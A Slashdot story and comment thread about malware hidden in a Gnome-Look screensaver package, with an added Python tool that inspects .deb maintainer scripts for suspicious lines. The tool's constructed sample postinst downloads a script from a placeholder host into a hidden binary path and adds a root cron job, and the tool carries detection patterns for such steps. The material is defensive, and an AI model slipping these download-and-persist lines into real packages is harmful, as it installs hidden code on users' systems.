Malware Found Hidden In Screensaver On Gnome-Look
AndGodSed writes "OMG! UBUNTU! reports the following: 'Malware has been found hidden inside an innocuous 'waterfall' screensaver .deb file made available on popular artwork sharing site Gnome-Look.org. The .deb file installs a script with elevated privileges designed to perform a DDoS attack as well as keep itself updated via downloads. The dodgy screensaver in question has since been removed from gnome-look, and this incident was a very basic, if potentially successful, attempt.'" A similar report at Digitizor.com says that similar malware was also found in a theme called Ninja Black. For those affected, both sites also provide instructions on cleansing your system.
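The summary's key detail is that the .deb itself carried a script that dpkg runs with root privileges. A .deb is a plain ar(1) archive whose control.tar.* member holds the maintainer scripts (preinst, postinst, prerm, postrm), so the scripts can be read before the package is ever installed. The following is an added example, not code from the Slashdot summary, OMG! Ubuntu!, Digitizor or the package in question: it parses a .deb with only the Python standard library, pulls out the maintainer scripts and flags lines that match a small, constructed indicator list (remote downloads, cron or init persistence, dotfiles dropped into binary directories). The sample package and its postinst are built in memory and are hypothetical; the indicator patterns are an assumption of this example, not a definitive rule set.

```python
"""Static triage of a .deb's maintainer scripts before installing it.

A .deb is an ar(1) archive holding debian-binary, control.tar.* and
data.tar.*; dpkg runs the preinst/postinst/prerm/postrm scripts found in
control.tar.* as root.  This parses the archive with the standard library
and reports script lines worth reading before the package is installed.
"""
import io
import os
import re
import tarfile

MAINT_SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}

# Constructed indicator list for this example (an assumption, not a standard).
INDICATORS = {
    "remote download": re.compile(r"\b(wget|curl)\b"),
    "cron persistence": re.compile(r"/etc/cron|\bcrontab\b"),
    "boot persistence": re.compile(r"/etc/(init\.d|rc\d?\.d|rc\.local)|update-rc\.d"),
    "hidden path": re.compile(r"/(usr/bin|bin|tmp)/\."),
}

def parse_ar(blob):
    """Return {member_name: bytes} for a classic ar archive (the .deb container)."""
    if not blob.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive")
    members, pos = {}, 8
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]                 # 60-byte member header
        if hdr[58:60] != b"`\n":
            raise ValueError("bad ar member header")
        name = hdr[0:16].decode().rstrip().rstrip("/")
        size = int(hdr[48:58].decode().strip())
        start = pos + 60
        members[name] = blob[start:start + size]
        pos = start + size + (size % 2)          # members are padded to even length
    return members

def maintainer_scripts(deb_blob):
    """Return {script_name: text} for maintainer scripts inside control.tar.*."""
    members = parse_ar(deb_blob)
    ctrl = next((v for k, v in members.items() if k.startswith("control.tar")), None)
    if ctrl is None:
        raise ValueError("no control.tar member")
    scripts = {}
    with tarfile.open(fileobj=io.BytesIO(ctrl), mode="r:*") as tf:
        for m in tf.getmembers():
            base = os.path.basename(m.name)
            if m.isfile() and base in MAINT_SCRIPTS:
                scripts[base] = tf.extractfile(m).read().decode("utf-8", "replace")
    return scripts

def triage(deb_blob):
    """Return [(script, line_no, indicator, line)] for every flagged script line."""
    findings = []
    for name, text in maintainer_scripts(deb_blob).items():
        for no, line in enumerate(text.splitlines(), 1):
            stripped = line.strip()
            if not stripped or stripped.startswith("#"):
                continue
            for label, rx in INDICATORS.items():
                if rx.search(stripped):
                    findings.append((name, no, label, stripped))
    return findings

# --- constructed sample .deb, built in memory (hypothetical content) ---
def _tar_gz(files):
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, data in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()

def _ar(members):
    out = [b"!<arch>\n"]
    for name, data in members:
        hdr = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode()
        out.append(hdr + data + (b"\n" if len(data) % 2 else b""))
    return b"".join(out)

SAMPLE_POSTINST = b"""#!/bin/sh
set -e
# innocent-looking bookkeeping
mkdir -p /usr/share/xscreensaver/waterfall
wget -q http://example.invalid/update.sh -O /usr/bin/.waterfall-run
echo '* * * * * root /usr/bin/.waterfall-run' >> /etc/cron.d/waterfall
"""

SAMPLE_DEB = _ar([
    ("debian-binary", b"2.0\n"),
    ("control.tar.gz", _tar_gz({
        "./control": b"Package: waterfall-screensaver\nVersion: 1.0\nArchitecture: all\n"
                     b"Maintainer: constructed <x@example.invalid>\nDescription: sample\n",
        "./postinst": SAMPLE_POSTINST,
    })),
    ("data.tar.gz", _tar_gz({"./usr/share/doc/waterfall/README": b"sample\n"})),
])

if __name__ == "__main__":
    for script, no, label, line in triage(SAMPLE_DEB):
        print(f"{script}:{no}: [{label}] {line}")
```

On a real system the same inspection can be done without custom code: `dpkg-deb -e pkg.deb outdir` extracts the control archive so the maintainer scripts can be read before `dpkg -i` runs them as root. A clean package from a trusted repository rarely needs to fetch anything over the network or write a cron entry from postinst, so a hit on those patterns is a reason to read the script, not an automatic verdict.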
But this is not really about vulnerabilities. This is a screensaver that user downloads from a website. Open source or not, you can't fix that unless the whole system is totally locked down like iPhone. And that doesn't really sound good.
But so what if it only gets access to one user? Malware doesn't really need root access. Stealing user data and sending spam is just as possible from user base. In history, malware tried to just fuck over the computer, which would have required root access, but now it's just about sending spam or stealing data.
What the summary didn't mention: the screensaver has been there less than 24 hours.
See pro-linux.de (German).
The MAFIAA is a bunch of mindless jerks who will be the first up against the wall when the revolution comes
No one is being locked into the repositories. If they want they can go elsewhere to get their software. The repositories merely provide a reasonably safe set of software available for the user.
Sigs are too short to say anything truly profound so read the above post instead.
Wrong. They may have multiple user ACCOUNTS but most of them are only going to have one actual meat sack (i.e. USER) at the keyboard.
Nothing worthwhile ever happens before noon
Not by anyone intelligent. The difference between Windows and Linux is how easy it is to remove stuff like this on Linux. It's easy on Linux. Sometimes practically impossible on Windows.
Qxe4
In this day and age, if your machine gets compromised by a virus, trojan, or rootkit, the only sensible thing to do is wipe and reinstall from a known clean backup. It doesn't matter what OS it is. There's no telling what other little friends they brought along that your chosen methods of detection didn't find. It's not really an option anymore to keep on going with a system that was compromised.
There's also been some evidence of malware that triggers AV software on purpose, and acts as a distraction while the real dirty payload gets delivered silently elsewhere in your system. You are now fooled into thinking your system is clean because your AV caught the distraction virus, completely missing the real one that was also installed.
@Mindless Drivel: 100% of Twitter posts ever Tweeted.
I'm afraid not. The reason this malware is easy to remove is because it doesn't do anything truly wretched, like patch libc and other applications, install a rootkit kernel module, and the like.
Having dealt with Linux boxes that have been hit by automatic exploitation tools that go well out of their way to hide their presence, I can tell you that no matter what the operating system, the standard advice holds: once the machine is infected, the only sure way to get it back to a known state is to restore from a backup made prior to the exploitation or to wipe it completely and start over. I should also point out that these machines were rooted through the exploitation of previously-patched vulnerabilities in setuid services -- which is the exact same vector many Windows worms use, including Slammer and Conficker.
The only difference between the tools I've run into and a full-on worm is that they run at the command of a cracker and scan IP address ranges of his choice. With a bare amount of automation, they could become very successful Linux worms, breaking into all those machines that, say, have old OpenSSH binaries that haven't been patched against its known remotely exploitable vulnerabilities.
The Freelance Wizard